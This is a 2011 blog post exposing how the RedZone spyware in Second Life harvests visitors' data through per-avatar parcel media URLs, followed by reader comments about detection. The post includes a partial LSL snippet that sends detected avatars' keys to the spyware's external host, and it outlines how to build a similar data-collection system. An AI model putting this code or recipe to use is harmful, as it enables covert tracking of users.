The Security Hole in the Second Life Client

9 02 2011

I have mentioned that zfRedZone spyware works by exploiting a security hole in the Second Life client software. The hole is this: It is possible to write a script that delivers a specific parcel media URL to a specific detected avatar. The makers of Second Life felt that users would like the ability to write scripts that would allow other users to select an audio or video stream they like and to watch or listen to this on a sim whilst other users could view different content. You can see how this is useful. When I was last at the ISM, they used this to deliver a selection of very interesting videos.

But then people got paranoid. Because if a mere user is allowed to actually see the parcel media URL that is delivering them content, what is to keep them in world in a sim where they frequently crash, and where videos must then be restarted from the beginning? Why wouldn’t they just fire up this URL in a streaming media client on their computers?

So to keep people in world, the URLs had to be hidden. We are not supposed to know who is feeding us the content. There are some fairly simple ways to discover the URLs, but the second life client does not tell us. And that is a key failing.

The other key failing is there is no security warning for parcel media. You are being redirected to an external site that Linden Labs makes quite clear in their TOS is outside of their control. You are being delivered content from that site, and yet your options are on or off. What is missing from the Second Life client is an option that says “The site isellsl.ath.cx would like to deliver you parcel media. Would you like to accept”?

If we had such an option, we would see at once the highly suspicous nature of the URL isellsl.ath.cx sends us, and we could then use a no option to ignore the “content”. Indeed a “never for this site” option would be more secure. This would also protect us from copycat sites, whilst still allowing us to enjoy the Second Life experience as it was intended.

So Linden Labs and other client developers: how about it? I will immediately change to whichever SL client offers me this option.

Although if Phoenix Viewer did it, I suspect the developers might find themselves under attack from Linden Labs for revealing those “secret” parcel media URLs.

Anyway, for interest, the code to exploit the parcel media bug looks like this:


sensor(integer num_detected)
{
   integer agentNum;
   for (agentNum=0; agentNum<num_detected; agentNum++)
   {
     key thisKey = llDetectedKey(agentNum);
     string myurl="http://isellsl.ath.cx/rz2.php?e=pscan&n=&quot; ;
     string myurl+=secretsauce(thiskey) ;
     // The rest of the URL contains the data gathered from a sensor.
     // I don't include all the code for doing so. You need the dataserver.
     llParcelMediaCommandList([PARCEL_MEDIA_COMMAND_AGENT, thisKey, PARCEL_MEDIA_COMMAND_URL, myurl]);
     llParcelMediaCommandList([PARCEL_MEDIA_COMMAND_PLAY]);
   }
}

Now add a sensor script that finds everyone nearby and delivers each one of them a custom URL using the information you just scanned from them (UUID, payment information, avatar age and of course name) and with a PHP back end that funnels the data into a mySQL database, and you have just written your own version of RedZone. The HTTP GET request will provide you with User Agent string and IP address – and even a cookie if you try hard enough. Of course you then need to convince lots of people to gather data for you – and if possible to pay for that privelege. To do that part you have to be both greedy and amoral though, so I presume no reader of this blog would do such a thing.

Advertisements

Actions

Information

5 responses

9 02 2011
verina resident

Now I think I understand why the GZ will show alarm outside the boundaries of the sim/parcel in which RZ is located without being able to get IP address. The alarm is a probe working only in sl. But you must be within the sim/parcel for the script to be able to open the URL to the naughty site.

9 02 2011
no2redzone

Yes, absolutely. So in some cases GreenZone can warn you even before RedZone can scan you.

15 02 2011
Psyke Phaeton

What channel is used for communications by RedZone? I would like to make an open source free scripted detector.

16 02 2011
no2redzone

Psyke, I am sorry I do not have that information. As I do not have a copy of RedZone, my investigation of the software has been at the protocol level. I think GreenZone developers may know this, so perhaps try asking on their blog?

I do recall that when zFire released the alt scanner HUD, he originally had it conflicting with scripted collars. As collars probably listen on low channel numbers, you may find the channel quite quickly.

In any case, not all communicationcan be via chat channels. The HUD seems to rely on a rezzed working RedZone on another sim. Instant messages would therefore be required to talk to the RedZone device, and RedZone itself talks to zFire’s Mac using HTTP.

I suspect that bones and probes use a channel though. Probably with an llRegionSay.

Good luck with your project.

16 02 2011
Tweets that mention The Security Hole in the Second Life Client « no2redzone -- Topsy.com

[…] This post was mentioned on Twitter by Wizard Gynoid, Feline Slade, Judi Newall, suspiria , Ann Otoole and others. Ann Otoole said: @NetAntwerp read https://no2redzone.wordpress.com/2011/02/09/the-security-hole-in-the-second-life-client/ […]




%d bloggers like this: